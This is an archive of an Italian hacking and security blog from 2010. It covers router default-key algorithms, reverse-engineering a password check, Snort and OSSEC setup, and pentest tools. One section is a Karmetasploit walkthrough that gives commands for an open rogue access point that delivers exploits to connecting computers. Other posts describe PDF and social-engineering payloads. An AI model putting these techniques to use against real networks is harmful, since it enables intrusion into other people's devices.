venerdì 31 dicembre 2010

Hackerato il server di Backtrack-linux.org

Giorno 1 Dicembre il server di Backtrack-linux, società che si occupa di sicurezza informatica a livello mondiale, è stato hackerato da un gruppo di hacker anonimi dopo che hanno bucato anche i server degli inj3ctor, si pensa che questi hacker abbiano sfruttato qualche vulnerabilità del cms wordpress che viene utilizzato da Backtrack-linux o che sono entrati da qualche altro sottodominio che viene ospitato nel server. Il team di Backtrack-linux ha reagito in modo ironico "Owned and Exposed", pubblicando sul loro sito i log dell'attacco effettuato dagli hacker, in questa pagina potete scaricare il log: http://www.exploit-db.com/papers/15823/ . Come dice  K.Mitnick qualsiasi cosa si connette ad internet è insicura!



sabato 18 dicembre 2010

Aiutiamo WikiLeaks

Salve a tutti, come tutti sanno WikiLeaks è un sito dove vengono pubblicati documenti riservati di vari governi nazionali,documenti che non vengono resi pubblici e quindi viene negata la verità che tutti i cittadini dei vari governi nazionali dovrebbero sapere. Ovviamente per questo motivo il sito sta subendo molti attacchi di tipo DoS e DDoS, per aiutare a sostenere il sito affinchè resti sempre online insieme ai suoi documenti, lo staff di WikiLeaks chiede a tutti che possiedono un sito di hosting o un server dedicato di hostare un mirror del sito per diffondere e preservare il più possibile tali contenuti. La procedura per mirrorare WikiLeaks si trovata in questa pagina http://www.wikileaks.ch/mass-mirror.html. Rendiamo l'informazione libera a tutti!




lunedì 13 dicembre 2010

Defacciato sito Università di Palermo "Unipa.it"


Salve, ieri domenica 12/12/2010 è stato defacciato il sito dell'Università di Palermo "unipa.it", insieme ai suoi sottodomini delle varie facoltà dell'Ateneo. Dalla home page messa dai cracker o "lamer" si pensa che forse sono cracker e studenti universitari turchi, anche perché nel caricamento della home page del sito defacciato si vede nella barra sotto il browser il puntamento ad un sito turco http://www.ankaracaddesi.com/. Condanno il gesto fatto da questi cracker che per farsi vedere fighi hanno recato danno all'Università di Palermo, ma anche critico l'ateneo di palermo per la poca sicurezza informatica, si sa che in italia e soprattutto nel meridione, gli enti pubblici non si pongono il problema della sicurezza in ambito informatico. Il problema che mi pongo e che  chiunque sapendo di una eventuale vulnerabilità del sito o dei server, possa ottenere informazioni sensibili del personale, dei docenti e degli studenti che sono registrati nel sito. Il sito compreso i suoi sottodomini sono stati ripristinati, tranne il sito della facoltà di informatica "cs.unipa.it", dominio che doveva almeno essere il primo ripristinato, tutt'ora che scrivo è ancora defacciato, che tristezza! Spero che in futuro queste situazioni non accadono più, mi rivolgo agli amministratori di reti e tecnici informatici dell'ateneo non sottovalutate il problema della sicurezza informatica. 



sabato 20 novembre 2010

AGPF KeyRec il software per risalire alle password di default di Alice

AGPF KeyRec è un software multipiattaforma sviluppato da Salvatore Fresta, un programmatore catanese, che tramite l'algoritmo del team di White Hats Crew, scoperto tramite il reverse engineering del router pirelli AGPF di Alice, permette di risalire alla password di default di un ssid di Alice con firmware agpf, tale software contiene la lista aggiornata dei Magic Numbers finora trovati e pubblicati sul forum di Gibit. Il software è scaricabile dal sito di Salvatore Fresta.  



Pynject di evilsocket

Pynject è un tools sviluppato da evilsocket per automatizzare l'estrazione dei dati da database mysql che hanno delle vulnerabilità di tipo sql injection, il tools è simile a sqlibf, ma è molto più veloce ed efficiente. Pynject lo potete scaricare da qui e trovarlo già in Backbox. Per il suo funzionamento potete vedere il video di evilsocket. 






giovedì 4 novembre 2010

Installare Evilgrade su Ubuntu o qualsiasi distro Linux

Prendendo spunto dalla guida di clshack.it di come installare Evilgrade su ArchLinux, era giusto scrivere una guida per l'installazione anche per le altre distro linux, semplicemente scaricando e installando i sorgenti dei pacchetti che ci servono. Innanzitutto scarichiamo l'ultima versione di Evilgrade v.2.0, a seguire questi pacchetti:


Per l'installazione di ogni pacchetto, date questi tre semplici comandi da root:

# perl Makefile.PL
# make
# make install

Per l'utilizzo di Evilgrade leggete la guida di clshack o vedete i video che si trovano online! ;)


martedì 21 settembre 2010

Script Php-Mysql

Voglio condividere con voi alcuni scripts php creati da me che interagiscono con il database mysql. Il primo script è un form di inserimendo dati da parte di utenti che visitano il nostro sito, come quelli che si vedono per la sezione contatti, invece il secondo preleva tutti i dati della tabella del nostro database, esempio possiamo prelevare tutti i commenti degli utenti del nostro blog con cms wordpress.

Vi linko il primo script che ho chiamato Database Form (dbform.php)

dbform.php

Ovviamente questo script va accompagnato con una pagina dove l'utente può inserire i propri dati che io ho chiamato form.php

form.php

Il link del secondo script selectdb.php

selectdb.php

Siete liberi di usare e modificare gli script e se vedete qualche errore nel codice potete segnalarlo, spero che questi semplicissimi scripts possano essere utili a qualcuno! ;)

sabato 18 settembre 2010

Vulnerabilità Router Telsey-Fastweb



Come per i router alice e fastweb-pirelli anche per il telsey è stato trovato l'algoritmo per la generazione delle key wpa di default, anzi più che altro è stato trovato dentro il firmware direttamente il key_gen, l'eseguibile per generare le key wpa. Grazie di nuovo allo studio effettuato dal team di wifiresearchers è stato possibile risalire all'algoritmo grazie al reverse del key_gen, per maggiori informazioni vi consiglio di leggere la loro full disclosure, se invece volete sapere come far eseguire il key-gen su linux vi consiglio di leggere l'articolo di audiocast.it, che spiega come estrarre il key-gen dal firmware ed emulare il key-gen compilato per CPU VIPER MIPS32 su linux. Ah vi ricordo che entrare in reti wifi altrui è reato, questo articolo è solo per scopo didattico e per sensibilizzare gli utenti fastweb a cambiare la loro wpa di default.






BackBox Linux


BackBox Linux è una distribuzione italiana per penetration test basata su Ubuntu Lucid 10.04 LTS che fa della semplicità e leggerezza il suo punto di forza,  dovute alla configurazione di un ambiente desktop minimale.
Inoltre, backbox ha dei propri repository su Launchpad ed è rilasciata sia per processori a 32 che 64bit , la distribuzione si configura come un utile strumento per il Penetration Testing. BackBox Linux è un progetto di OpenSoluzioni. BackBox è stata sviluppata partendo da una installazione minimale di Ubuntu Lucid e apportando ulteriori modifiche. Sotto il punto di vista grafico si è cercato di rendere la distribuzione piacevole alla vista, preferendo Xfce a KDE. Concludendo, il progetto si rivolge a tutti coloro che operano nel mondo dell’ICT Security o che semplicemente sono appassionati d’informatica.




venerdì 10 settembre 2010

Reverse Engineering su sistemi Unix e Linux

Prendendo spunto da blacklight e darkjoker, vorrei parlarvi del reverse engineering di software o eseguibili su sistemi unix e linux. Per comprendere il reverse bisogna avere una minima conoscenza del C e dell'Assembly, per disassemblare un eseguibile sui sistemi unix/linux possiamo utilizzare gdb o objdump, passiamo alla pratica creiamo un programma in C che ci chiede di inserire la password corretta che abbiamo inserito nel codice, quindi dobbiamo tramite il reverse fargli riconoscere qualunque password che impostiamo modificando i registri jne effettuando l'eliminazione del salto condizionato direttamente sulla stringa che stampa al video "password corretta", per maggiori informazioni leggete il pdf reverse di blacklight o i crackme di darkjoker. Scriviamo e compiliamo il nostro programma, code:


#include   stdio.h
#include   string.h
main() {
char pwd[] = "prova";
char str[30];
printf ("Inserire la password: ");
scanf ("%s",str);
if (!strcmp(str,pwd))
printf ("Password corretta\n");
else
printf ("Password errata\n");
}   

compiliamo con gcc:

gcc vuln.c -o vuln

eseguiamo il programma:

GiacomoAspire5310:reverse giacomo$ ./vuln
Inserire la password: ciccio
Password errata
GiacomoAspire5310:reverse giacomo$ ./vuln
Inserire la password: prova
Password corretta
 
Per disassemblare il programma io ho utilizzato solo objdump, invece blacklight nella sua guida usa gdb, quello che ci interessa è di analizzare solo la main del programma per potere modificare la jne impostando al suo posto dei nop (0x90), diamo il comando:

GiacomoAspire5310:reverse giacomo$ objdump -D vuln | grep main
    1f0d:    e8 2c 00 00 00           call   1f3e <_main>
00001f3e <_main>:
    1f45:    e8 00 00 00 00           call   1f4a <_main+0xc>
    1f95:    75 10                    jne    1fa7 <_main+0x69>
    1fa5:    eb 0e                    jmp    1fb5 <_main+0x77>
    2016:    e0 8f                    loopne 1fa7 <_main+0x69>
    201a:    e0 8f                    loopne 1fab <_main+0x6d>

Adesso che abbiamo visto la stringa esadecimale della jne, apriamo il programma vuln con un editor esadecimale e andiamo a sostituire 75 10 con 90 90 (che sono i nop) salviamo e avviamo il nostro eseguibile:

GiacomoAspire5310:reverse giacomo$ ./vuln
Inserire la password: ciccio
Password corretta

come vedete adesso possiamo inserire qualsiasi password! Il reverse viene utilizzato per il crack di giochi,software o per modificare il comportamento di un eseguibile, ovviamente non è sempre cosi facile crackare un programma, questo è un semplice esempio che spiega le basi di come fare, per maggiori informazione o per fare un pò di pratica vi consiglio di dare un'occhiata alla sezione di CrackMe di darkjoker. :)


venerdì 27 agosto 2010

Installare Mac Leopard su un Acer Aspire 5310 in dual boot con Ubuntu


Salve a tutti, vorrei condividere a tutti che posseggono un acer aspire 5310, la mia procedura per installare il Leopard su tale portatile. Vi ricordo che è vietato dal contratto di licenza dell'apple installare qualsiasi sistema mac su pc non apple, quindi questo è un tutorial dimostrativo per coloro che volessero provare il mac prima di acquistarlo e per vedere se riescono ad installare tale sistema operativo nei propri pc, quindi non mi assumerò nessuna responsabilità per un uso illegale. Prima di tutto scaricate l'ultima versione iso di iDeneb v1.6 10.5.8 Lite Edition tramite torrent (una versione modificata del Leopard 10.5.8 per poter essere installata in un qualsiasi pc), per maggiore informazioni di questa versione visitate il sito ufficiale iHackintosh, dopo di che creiamo la partizione in hfs+ (Filesystem per Macintosh) dove verrà installato il votro Leopard. Vi sono due modi per creare la partizione o direttamente dal dvd di installazione di iDeneb andando su Utility - Utility Disco selezionando la partizione e iniziandolo (formattandolo) in hfs+ (journaled) oppure se avete qualche problema nel formattare come ho avuto io potete usare linux (Ubuntu) per partizionare il disco tramite gparted, ah vedete se su gparted avete le librerie per hfs e hfs+ se no installatele con apt, per vedere qualli pacchetti bisogna installare date un apt-cache search hfs+. Bene adesso possiamo iniziare l'installazione avviando il dvd, non ci dovrebbero essere problemi per l'avvio del dvd, scegliete la partizione che avete formattato prima e andate su personalizza a selezionare i drivers e le patch per l'hardware dell'aspire, lasciate quelle di default e selezionate il kernel 9.8 Qoopz con il kernel Voodoo ho avuto problemi, selezionate i drivers ps/2 quelli VoodooPS2 con ApplePS2 il sistema operativo non si avvia, per i drivers audio selezionate solo i VoodooHDA, per i chipset selezionate Ahci sata/ide e ichx fixed, per i drivers della scheda ethernet selezionate AppleBCM5758M e per la scheda wifi selezionate i broadcom wifi, su system Management selezionate VoodooBattery Manager, per i drivers video selezionate gli GMA950 e infine selezionate la lingua italiana. Una volta finita l'installazione all'avvio non dovete avere problemi l'hardware sarà riconosciuto, l'unico difetto sarà la scheda ethernet che viene riconosciuta da Leopard ma non funziona, per questo c'è una soluzione seguendo questa guida broadcomBCM5787M dove dovete scaricare il file zip che contiene la guida e lo script di come configurare la scheda per la connessione. Ah dimenticavo dopo avere installato Leopard al primo avvio non compare nel grub2 la voce del sistema mac, quindi dovete accedere su ubuntu e da terminale dare update-grub2 cosi aggiorna il grub inserendo anche la selezione per il Mac OSX Leopard. Se volete successivamente aggiungere qualche drivers potete fare dal dvd d'installazione avviando come se dovete fare una nuova installazione, deselezionando su personalizza tutte le voci di default e selezionando soli i drivers che dovete installare e completare l'installazione, non vi preoccupate non effettuerà nessuna installazione caricherà solo i drivers selezionati, invece per rimuovere i drivers che non vi servono potete fare direttamente su Leopard andando su Unità disco del Leopard - Sistema- Libreria - Extensions e cestinando i drivers che non vi servono, se installate Kext helper potete caricare direttamente i drivers da Leopard dopo che avete scaricato da internet o tramite Pacifist i drivers che avete bisogno, per ulteriori informazione su come utilizzare Kext helper e Pacifist andate sul forum di iHackintosh. Tutto qui buon divertimento a tutti.


sabato 31 luglio 2010

IpCop il software firewall GNU/Linux

IpCop è una mini-distribuzione linux adatta per realizzare un firewall hardware e software, protegge la nostra rete da intrusioni esterne non autorizzate. È un'ottima soluzione per piccole reti, reti aziendali e SOHO (Small Office-Home Office). Può essere adattata ad ogni esigenza e può essere usata anche su hardware piuttosto datato, può anche essere usata da amministratori di rete che non conoscono Linux per creare un firewall Linux-based. IpCop offre un'ampia gamma di caratteristiche tecniche: si va dal Linux netfilter standard con capacità di NAT al supporto per DMZ via DNAT, dal supporto DHCP (sia server che client) al supporto NTP per sincronizzare e servire la data e l'ora, dalla possibilità di attivare un proxy a quella di attivare un IDS. Inoltre supporta quattro schede di rete e un numero illimitato di connessioni VPN, oltre ad offrire la possibilità di backup e restore della configurazione. È inoltre facilmente estendibile grazie a numerosi moduli presenti in Internet. Potete scaricare la iso dal sito IPCop invece per l'installazione e configurazione potete seguire questa guida pubblicata su pluto.it.





Asterisk la telefonia VoIP

Asterisk è un ottimo software open source per la telefonia VoIP. La completezza dei suoi contenuti e la sua affidabilità lo rendono una piattaforma ideale per una vasta gamma di applicazioni: è utilizzato come elemento portante per realizzare mediatori RTG/IP (centralini in grado cioè di utilizzare sia le linee telefoniche tradizionali sia i canali IP), sistemi Centrex (PBX "virtuali" e centralizzati), applicazioni per la gestione di Call Center ed altro ancora. Asterisk identifica i tipi d'interfaccia sui quali si può telefonare con il termine canal, canale. Un canale può essere, per esempio, l'interfaccia ISDN (che si chiama canale CAPI) o l'interfaccia Ethernet per il VoIP. Ogni protocollo VoIP ha un canale diverso, quindi se si vuole telefonare con SIP o H.323, bisogna configurare un canale SIP o un canale H.323. La configurazione dei canali è fatta con dei file di configurazione *.conf, che si trovano nella directory /etc/asterisk (by Wikipedia). Asterisk può essere installato su ubuntu tramite apt o direttamente compilando i sorgenti scaricabili dal sito Asterisk.org qui troviamo anche tools e add-ons di asterisk da poter scaricare, pure la distro linux personalizzata per asterisk in formato iso. Se volete compilare l'ultima versione di asterisk vi linko dei siti che spiegano come fare e come installare anche la GUI di Asterisk, HOWTO: Installiamo AsteriskGUI (interfaccia web per configurare asterisk sviluppata da Digium) su di un server Ubuntu [aggiornata e corretta al 06/09/08] oppure potete consultare questo sito Asterisk-IT che spienga l'installazione e la configurazione di Asterisk e della sua GUI.




martedì 29 giugno 2010

Exploit Pdf con Metasploit3

Salve questo è un video didattico che mostra come si possono inserire codici malevoli in un file pdf tramite l'uso di metasploit3 e con la tecnica del social engineering fargli eseguire o scaricare tramite email il pdf alla vittima, il video è un pò lungo e senza audio, e questa volta è stato girato sulla mia kubuntu modificata, oltre a fare video con backtrack volevo fare uno con la mia Kubuntu! Il video fa capire il pericolo che ogni internauta può correre anche se scarica o apre un semplice file pdf, quindi prima di aprire qualsiasi files fate sempre una scansione con il vostro antivirus sempre se lo rileva il virus! ;)

Blog interessanti

Salve vorrei segnalarvi alcuni blog dove io prendo spunto per i miei studi e approfondimenti per tutto ciò che riguarda l'informatica. Il primo blog/sito molto interessante e quello di backlight dove vi è un wiki "hacknowledge" ancora non completo che parla un pò di tutto,dall'architettura dei calcolatori alla programmazione e networking, si possono scaricare anche delle guide in pdf come il manuale del linguaggio C e Assembly. L'altro blog è di evilsocket un programmatore e hacker molto esperto, nel suo blog vi sono molti articoli interessanti da leggere.Gli altri siti che vi elenco parlano sopratutto dei tools della distribuzione linux backtrack tramite video e articoli è sono Archangel Amael's BT Tutorial e g0tmi1k. Infine il blog di Irongeek che parla di hacking sia su linux che windows. Spero che questi link possano essere utili a coloro che sono agli inizi e voglio approfondire almeno i concetti di base dell'hacking, dell'informatica e della sua sicurezza. Ah dimenticavo in vostro aiuto c'è sempre google o un qualsiasi motore di ricerca se dovete cercare o approfondire qualsiasi argomenti!






lunedì 10 maggio 2010

Reverse key wpa FastWeb dei router Pirelli e di Alice

Come già si sapeva è stato fatto il reverse engineering dei firmware Pirelli Fastweb e di Alice che ha portato alla scoperta dell'algoritmo di generazione delle chiavi wpa di default, infatti tramite l'essid e il mac dell' Hag di FastWeb (router Pirelli) e di Alice è possibile con questo algoritmo risalire alla key wpa di default. Per maggiori informazione sulla tecnica utilizzata visitate questo sito Wireless Security Researchers. Questo è un articolo per informare sulla vulnerabilità di tale router e provider e per sensibilizzare gli utenti FastWeb e Alice a modificare la loro chiave wpa di default, quindi non mi assumo nessuna responsabilità per un uso illegale di tale articolo! Se volete avere già pronti gli script degli algoritmi visitate il sito di evilsocket.




ArpON

Arpon è un software sviluppato da un programmatore catanese, che rileva e blocca i tentativi di attacco di tipo arp poisoning, utilizzando due tipi di tecniche anti arp poisoning SARPI o "Static Arp Ispezione" e DARPI o "approccio dinamico Arp di controllo.Si può installare su ubuntu direttamente tramite repository, per maggiori informazioni sul suo utilizzo e del man dei vari comandi visitate il sito Arpon.



sabato 8 maggio 2010

OSRW

La community di Backtrack ha aperto ufficialmente il progetto Osservatorio Sicurezza delle Reti Wireless, il progetto consiste nel promuovere e informare gli utenti che utilizzano reti wireless dei rischi che corrono per una cattiva gestione della loro rete wifi, come per esempio lasciare la propria rete wifi open o con la crittografia wep. Potete partecipare al progetto inviando i risultati delle vostre sessioni di wardriving della propria città. Per maggiori informazioni visitate il sito italiano di backtrack OSRW.




martedì 6 aprile 2010

IDS Intrusion detection system

Ho parlato delle tecniche di attacco verso host e server, oggi parlo come difendersi da attacchi provenienti dalla rete utilizzando snort e ossec con web gui, sono dei intrusion detection system, cioè dei software che rilevano o anche bloccano molti attacchi che provengono da internet e scansioni con port scanner . Installiamo snort su ubuntu server da gestore pacchetti synaptics o su qualsiasi distro linux compilando i sorgenti seguendo questa guida Installare e configurare Snort, una volta installato snort dobbiamo configurarlo e caricare i rules opensource dal sito di emergingthreats, modifichiamo il file conf di snort da shell logati come root

sudo nano /etc/snort/snort.conf

modifichiamo la variabile var EXTERNAL_NET any togliendo any e mettendo !$HOME_NET, con questo comando snort rileva gli indirizzi ip esterni alla nostra rete LAN, dopo installiamo oinkmaster che ci permetterà di scaricare le rules dal sito di emergingthreats

sudo apt-get install oinkmaster

modifichiamo il suo file conf

sudo nano /etc/oinkmaster.conf

e inseriamo sotto a #url = http://www.snort.org/dl/rules/snortrules-snapshot-2_2.tar.gz commentandolo noi l'url di emergingthreats url =
http://www.emergingthreats.net/rules/emerging.rules.tar.gz
, salviamo e inseriamo in /etc/snort/snort.conf questo:

# Emergin rules
var SSH_PORTS 22
include $RULE_PATH/emerging-attack_response.rules
include $RULE_PATH/emerging-botcc.rules
include $RULE_PATH/emerging-compromised.rules
include $RULE_PATH/emerging-dos.rules
include $RULE_PATH/emerging-drop.rules
include $RULE_PATH/emerging-dshield.rules
include $RULE_PATH/emerging-exploit.rules
include $RULE_PATH/emerging-game.rules
include $RULE_PATH/emerging-inappropriate.rules
include $RULE_PATH/emerging-malware.rules
include $RULE_PATH/emerging-p2p.rules
include $RULE_PATH/emerging-policy.rules
include $RULE_PATH/emerging-rbn.rules
include $RULE_PATH/emerging.rules
include $RULE_PATH/emerging-scan.rules
include $RULE_PATH/emerging-virus.rules
include $RULE_PATH/emerging-voip.rules
include $RULE_PATH/emerging-web.rules
include $RULE_PATH/emerging-web_sql_injection.rules
# Fine emergin rules

scarichiamo le rules sulla cartella /etc/snort/rules con questo comando

/usr/sbin/oinkmaster -o /etc/snort/rules

bene non ci resta che riavviare snort con /etc/init.d/snort restart e proviamo se funziona effettuando qualche scansione DoS sul nostro web server, il log file di snort si trova in /var/log/snort chiamato "alert" ovviamente!
Se tutto va bene installiamo ossec insieme alla sua web gui, un'altro ottimo IDS che serve per analizzare in tempo reale tutti i files log di sistema compresi quelli di snort e apache2, ricerca di rootkit, monitoraggio e applicazione della policy, segnalazione di situazioni sospette o critiche tramite email ed è altamente personalizzabile.
Installiamo ossec seguendo le guide sul suo sito, scaricando e estrando i suoi files

root@ubuntu:~# wget http://www.ossec.net/files/ossec-hids-latest.tar.gz


root@ubuntu:~# tar -zxvf ossec-hids-*.tar.gz (or gunzip -d; tar -xvf)


root@ubuntu:~# cd ossec-hids-*


root@ubuntu:~# ./install.sh

ci chiederà quale versione installare Server, Agent o Local, se è per fare delle prove sulla vostra rete LAN vi consiglio d'installare la versione local, comunque la procedura di installazione è guidata e anche in italiano. Installazione ultimata avviamo ossec con questo comando

root@ubuntu:~# /var/ossec/bin/ossec-control start

se si avvia e funziona passiamo all'installazione della sua web gui, come per ossec scarichiamola, estraiamola e spostiamola in /var/www/

root@ubuntu:~# wget http://www.ossec.net/files/ui/ossec-wui-0.3.tar.gz

root@ubuntu:~# tar -zxvf ossec-wui-0.3.tar.gz

root@ubuntu:~# mv ossec-wui-0.3 /var/www/ossec-wui-0.3

passiamo all'installazione della web-gui

root@ubuntu:~# cd /var/www/ossec-wui-0.3

root@ubuntu:~# ./setup.sh

adesso aggiungiamo www-data sull'user di ossec su nano /etc/group/ cosi ossec:x:1001:www-data, diamo i permessi alla cartella /tmp che si trova in /var/www/ossec-wui-0.3 cosi

root@ubuntu:/var/www/ossec-wui-0.3# chmod 770 /tmp

root@ubuntu:/var/www/ossec-wui-0.3# chown www-data:www-data /tmp

infine modifichiamo il php.ini di PHP installato insieme con Apache2 sostituendo questi valori

max_execution_time = 180
max_input_time = 180
memory_limit = 30M

bene abbiamo finito, riavviamo apache2 e utiliziamo ossec con la web-gui, scrivendo nel nostro browser http://localhost/ossec-wui-0.3.



martedì 9 marzo 2010

Fake AP con Karmetasploit

Ci sono vari modi per creare un AP falso, che potrebbe essere utile per fare delle prove per testare le keys wep o wpa. Nel tool di Gerix-Wifi-Cracker c'è una opzione che permette di creare un AP falso impostando il tipo di crittografia e la password, ovviamente dovreste avere almeno due scheda wireless, una serve per creare l'AP l'altra per craccarlo. Potremo anche crearlo personalmente seguendo questa guida presa dal forum italiano di remote-exploit Come creare un AP falso con tua scheda wifi, vediamo ora come crearlo con karmetasploit un tool sviluppato dallo stesso team di metasploit, karma creerà un fake AP senza password quindi open che chiunque potrà collegarsi, quando un pc si collegherà all'AP karma invierà una serie di exploits nel pc vittima per ottenere una sessione di meterpreter. Passiamo ora all'installazione e configurazione di karma!

Scarichiamo karma dal sito di metasploit

root@morfes:/opt/metasploit3/msf3# wget "http://metasploit.com/users/hdm/tools/karma.rc"
--2009-05-04 18:43:26-- http://metasploit.com/users/hdm/tools/karma.rc
Resolving metasploit.com... 66.240.213.81
Connecting to metasploit.com|66.240.213.81|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1088 (1.1K) [text/plain]
Saving to: `karma.rc'

100%[============================================================================>] 1,088 --.-K/s in 0s

(88.7 MB/s) - `karma.rc' saved [1088/1088]



modifichiamo il file dhcp.conf inserendo questi comandi, ah prima facciamo un backup del file

root@morfes:~# nano /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}


installiamo dei requisiti che servono a karma

root@morfes:~# gem install activerecord sqlite3-ruby
Successfully installed activerecord-2.3.2
Building native extensions. This could take a while...
Successfully installed sqlite3-ruby-1.2.4
2 gems installed
Installing ri documentation for activerecord-2.3.2...
Installing ri documentation for sqlite3-ruby-1.2.4...
Installing RDoc documentation for activerecord-2.3.2...
Installing RDoc documentation for sqlite3-ruby-1.2.4...


mettiamo in modalità monitor con airmon-ng una delle nostre schede wifi e avviamo airbase-ng per creare l'AP falso

root@morfes:~# airmon-ng


Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]



root@morfes:~# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)



root@morfes:~# airbase-ng -P -C 30 -e "Morfes" -v mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on ath1 to 1800
22:52:25 Access Point with BSSID 00:1A:4D:49:0B:26 started.


impostiamo l'ip per la nostra nuova interfaccia di rete at0 e attiviamo il DHCP Server

root@morfes:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@morfes:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
root@morfes:~# ps aux | grep dhcpd
dhcpd 6490 0.0 0.1 3812 1840 ? Ss 22:55 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root 6493 0.0 0.0 3232 788 pts/0 S+ 22:55 0:00 grep dhcpd


e infine avviamo karma

root@morfes:/opt/metasploit3/msf3# ./msfconsole -r karma.rc


Vi ricordo che questo è un tutorial dimostrativo, tutto ciò deve essere fatto nella vostra rete lan! Vi ricordo inoltre che entrare in una rete wifi altrui anche se open è illegale, anche perchè come dimostrato nell'articolo se entrate in una rete wifi open creata da qualche cracker potete diventare delle possibile vittime! :)




sabato 6 marzo 2010

Xplico

Xplico ora è anche su backtrack! Xplico è un Network Forensic Analysis Tool (NFAT), ovvero un software che riesce a ricostruire i contenuti dei pacchetti catturati tramite l'utilizzo di packet sniffer come Wireshark e Tcpdump o anche con Xplico stesso, infatti Xplico oltre che ricostruire i pacchetti pcap ha pure la funzione di sniffer. Xplico riesce a ricostruire tutti i dati trasportati dai protocolli come HTTP, IMAP, POP, SMTP, SIP "voip", FTP e TELNET, anche ricostruire le email scambiate e le chat come facebook. Il software è sviluppato da Gianluca Costa e Andrea de Franceschi, rilasciato sotto licenza Open Source ed è installabile solo su Linux. Per avere maggiori informazioni su come installarlo su altre distro linux visitate il wiki del sito ufficiale di Xplico. Tramite il mio video vi faccio vedere come installarlo su backtrack e come funziona con un semplice esempio di sniffer del protocollo HTTP tramite la sua interfaccia web.









domenica 21 febbraio 2010

CAT2010 Cracca al tesoro


Anche quest'anno si terrà il CAT2010 l'hacker games organizzato dal team della community italiana di Backtrack, il gioco consiste nel craccare un certo numero di reti wireless sia wep che wpa messi a disposizione dagli organizzatori e di violare i sistemi operativi collegati ad essi, per ogni rete wifi craccata e sistema violato si otterranno dei punti, si partecipa per squadra con un massimo di 4 persone e l'iscrizione è gratuita. L'evento si svolgerà a Milano il 13 marzo ed a Orvieto verso il mese di luglio, per l'iscrizione andate sul sito ufficiale dell'evento Wardriving o chiedete informazioni in irc sul canale #backtrack.it su freenode.net. Buona cracca al tesoro a tutti!



giovedì 11 febbraio 2010

Installare un Web Server

È molto utile installare e configurare un web server nella propria rete lan, sia su una macchina fisica o virtualmente con la nostra Vmware, per poter effettuare dei test di vulnerabilità e renderci conto se il nostro server è vulnerabile agli attacchi. Spiego brevemente tramite delle guide che si trovano in internet come installare un web server linux, in questo caso la versione di Ubuntu 9.10 e configurare alcuni servizi più usati che girano sul server come l'OpenSsh, Apache2, Mysql, Php, Vsftpd, Samba ecc...
Prima di tutto scarichiamo la iso di Ubuntu Server 9.10 dal sito ufficiale di Ubuntu, una versione che non contiene nessun manager desktop cioè nessuna interfaccia grafica per l'ambiente desktop come gnome o kde, quindi si lavora solo tramite linea di comandi "shell", prima di avviare l'installazione ci viene chiesto se installare anche Lamp cioè Apache2-Mysgl-Php, non dobbiamo installarlo perchè ci pensiamo noi ad installarlo e configurarlo. Utilizziamo la guida del wiki di Ubuntu.it per installare i vari servizi che servono per il nostro server, potete scegliere voi quali servizi utilizzare. Nel wiki vengono descritti e spiegati tutti i passaggi per l'installazione e configurazione, io vi linko anche altre guide più approfondite per la configurazione di Apache2, Samba e Vsftpd. Buon divertimento con il vostro web server personale!






martedì 2 febbraio 2010

Sicurezza Reti Wireless

Come sappiamo le reti wireless sono molto vulnerabili, specialmente quelle che usano la crittografia wep che si possono crackare anche meno di 5 minuti senza aver bisogno di una wordlist. Invece le wpa e le wpa2 si possono crackare solo con l'uso di una wordlist, quindi anche se si cattura l'handshake è molto difficile risalire alla key, almeno che la vittima non usa una password molto semplice. Se invece si usano key esadecimali a partire da almeno di 10 caratteri con numeri e lettere se possibile accompagnate anche da simboli speciali come questi "£@#]* , sarà molto difficile scoprire la key anche se si è catturato l'handshake. Vi dimostro con i miei video come è facile e veloce riuscire a scoprire le password della mia wep e wpa2, utilizzando i tools di aircrack-ng inseriti in BT, vi linko anche i video di Backtrack.it che utilizzano Gerix-Wifi-Cracker un tool anch'esso inserito in BT creato da emgent e crossbower, un tool che automatizza e semplifica grazie alla sua interfaccia grafica l'uso di aircrack-ng. Per evitare che qualche malintenzionato entri nella vostra rete wifi, vi consiglio di usare crittografia wpa o wpa2 "AES" con key esadecimale di almeno 10 caratteri, di abilitare nel vostro router il MAC filter, cosi il vostro router non farà collegare nessun altro indirizzo MAC "indirizzo fisico delle vostre schede di rete" tranne per quelli impostati da voi sul router e di disabilitare il DCHP che assegna in automatico gli indirizzi IP della vostra rete, impostate gli indirizzi IP dei vostri PC manualmente, e infine cambiate la password di accesso del vostro router non lasciate quella di default!!!

martedì 19 gennaio 2010

SET - Social Engineering Toolkit

Social Engineering Toolkit è un tools disponibile in BT, realizzato da David Kennedy serve per automatizzare gli attacchi di tipo social-engineering come per esempio la creazione di false email che contengono codice malevolo, che servono per violare il sistema operativo del pc vittima che riceve l'email dall'attaccante, e la possibilità di creare un web server trappola in grado di diffondere una applet java con codice malevolo. Vi linko il video di Backtrack.it dove viene effettuato un attacco SET con la creazione di una falsa email dove viene inviata alla vittima con un file pdf malevolo allegato, invece il secondo video creato da me, viene realizzato un sito trappola dove l'IP viene camuffato da un link inviato tramite email. Ecco il link del mio video WebSiteAttack





domenica 17 gennaio 2010

Nmap

"Vedete anche Trinity di Matrix usa Nmap"


Nmap
è un tools inserito in BT, che permette di effettuare scansioni di reti
